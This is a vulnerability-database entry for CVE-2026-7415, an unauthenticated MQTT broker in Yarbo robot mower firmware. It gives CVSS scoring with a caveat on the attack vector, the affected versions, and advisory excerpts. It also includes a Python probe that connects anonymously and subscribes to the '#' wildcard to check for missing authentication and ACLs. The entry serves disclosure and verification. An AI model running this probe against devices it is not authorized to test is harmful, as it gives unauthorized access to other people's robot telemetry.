CVE-2026-7415
Published 2026-05-07
Priority P2 · 61 · critical · 9.8 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Caveat: the vector scores Attack Vector as Network (AV:N), yet both the description and the VulDB entry scope the attack to hosts on the same local network, which matches Adjacent (AV:A) more closely; with AV:A the same metrics give a base score of 8.8.
EPSS 0.54% · 41.5th percentile
The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind.
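The description makes two separate claims: the broker accepts a connection carrying no credentials (missing authentication), and that anonymous session can then read and write any topic (missing authorization). The following probe, added here as an example and not taken from Yarbo or from the advisory, tests exactly those two properties on the wire using MQTT 3.1.1: it sends a CONNECT with the username/password flags clear, reads the CONNACK return code, and if the connect is accepted it asks for a subscription to the `#` wildcard filter and checks whether the SUBACK grants it. The target host `192.0.2.10` and port 1883 are assumptions; run it only against a broker you own or are authorized to test.

```python
"""MQTT 3.1.1 anonymous-access and wildcard-ACL probe for CVE-2026-7415.
Added example; not Yarbo's code. Host and port below are assumptions."""
from __future__ import annotations

import socket
import struct

# CONNACK return codes defined by MQTT 3.1.1 section 3.2.2.3
CONNACK_CODES = {
    0: "connection accepted",
    1: "unacceptable protocol version",
    2: "identifier rejected",
    3: "server unavailable",
    4: "bad user name or password",
    5: "not authorized",
}


def encode_remaining_length(n: int) -> bytes:
    """MQTT variable-length 'remaining length' field: 7 data bits per byte, MSB set = more bytes."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)


def mqtt_string(s: str) -> bytes:
    """UTF-8 string with a 2-byte big-endian length prefix."""
    data = s.encode("utf-8")
    return struct.pack("!H", len(data)) + data


def build_connect(client_id: str, username: str | None = None,
                  password: str | None = None, keepalive: int = 30) -> bytes:
    """CONNECT packet. With no username/password the credential flags (0x80/0x40) stay
    clear, which is precisely the anonymous connection the advisory says is accepted."""
    flags = 0x02  # clean session
    payload = mqtt_string(client_id)
    if username is not None:
        flags |= 0x80
        payload += mqtt_string(username)
    if password is not None:
        flags |= 0x40
        payload += mqtt_string(password)
    body = mqtt_string("MQTT") + bytes([0x04, flags]) + struct.pack("!H", keepalive) + payload
    return bytes([0x10]) + encode_remaining_length(len(body)) + body


def parse_connack(pkt: bytes) -> int:
    """Return the CONNACK return code; 0 means the broker let the session in."""
    if len(pkt) < 4 or pkt[0] != 0x20 or pkt[1] != 0x02:
        raise ValueError("not a CONNACK packet")
    return pkt[3]


def build_subscribe(packet_id: int, topic_filter: str, qos: int = 0) -> bytes:
    """SUBSCRIBE packet; the fixed-header flags must be 0b0010 (hence 0x82)."""
    body = struct.pack("!H", packet_id) + mqtt_string(topic_filter) + bytes([qos])
    return bytes([0x82]) + encode_remaining_length(len(body)) + body


def parse_suback(pkt: bytes) -> list[int]:
    """Per-filter SUBACK codes: 0x00-0x02 = granted at that QoS, 0x80 = refused.
    We only ever send one filter, so the remaining length always fits in one byte."""
    if len(pkt) < 5 or pkt[0] != 0x90 or pkt[1] > 0x7F:
        raise ValueError("not a single-filter SUBACK packet")
    return list(pkt[4:2 + pkt[1]])  # body starts at 2; bytes 2-3 are the packet id


def assess(connack_code: int, suback_codes: list[int] | None) -> str:
    """Turn the two broker responses into a verdict on authentication and authorization."""
    if connack_code != 0:
        return "anonymous connect refused: " + CONNACK_CODES.get(connack_code, "unknown code")
    if suback_codes is None:
        return "anonymous connect accepted; subscribe not attempted"
    if suback_codes and all(c == 0x80 for c in suback_codes):
        return "anonymous connect accepted, but wildcard subscribe denied (ACL in place)"
    return "anonymous connect accepted and '#' subscribe granted: no authentication, no ACL"


def probe(host: str, port: int = 1883, timeout: float = 5.0) -> str:
    """Run the probe against a live broker (network I/O; host and port are assumptions)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect("cve-2026-7415-probe"))
        code = parse_connack(sock.recv(4))
        if code != 0:
            return assess(code, None)
        sock.sendall(build_subscribe(1, "#"))
        return assess(code, parse_suback(sock.recv(64)))


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"))
```

A hardened broker answers the anonymous CONNECT with return code 5 (not authorized), or accepts it but answers the `#` SUBSCRIBE with 0x80; a broker in the state the advisory describes returns 0 for both, which is the condition `assess` reports as "no authentication, no ACL". The packet builders and parsers are pure functions, so the same logic can be replayed against captured traffic without touching the network.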
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yarbo | firmware | <= 2.3.9 | — |
| yarbo | lawn_mower_firmware | — | — |
| yarbo | lawn_mower_pro_firmware | — | — |
VulDB
CVE-2026-7415 [CRITICAL] Yarbo up to 2.3.9 MQTT Broker missing authentication
vuldb · 2026-05-07 · CVSS 9.8
A vulnerability rated critical has been identified in Yarbo up to 2.3.9. Affected is unspecified functionality of the MQTT Broker component; manipulation of it results in missing authentication.
This vulnerability is tracked as CVE-2026-7415. The attack is only possible from within the local network. No exploit is known to exist.
GHSA
CVE-2026-7415 [CRITICAL] CWE-306 GHSA-5jxr-5v22-49gf: The MQTT broker embedded in Yarbo firmware v2
ghsa_unreviewed · 2026-05-07
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.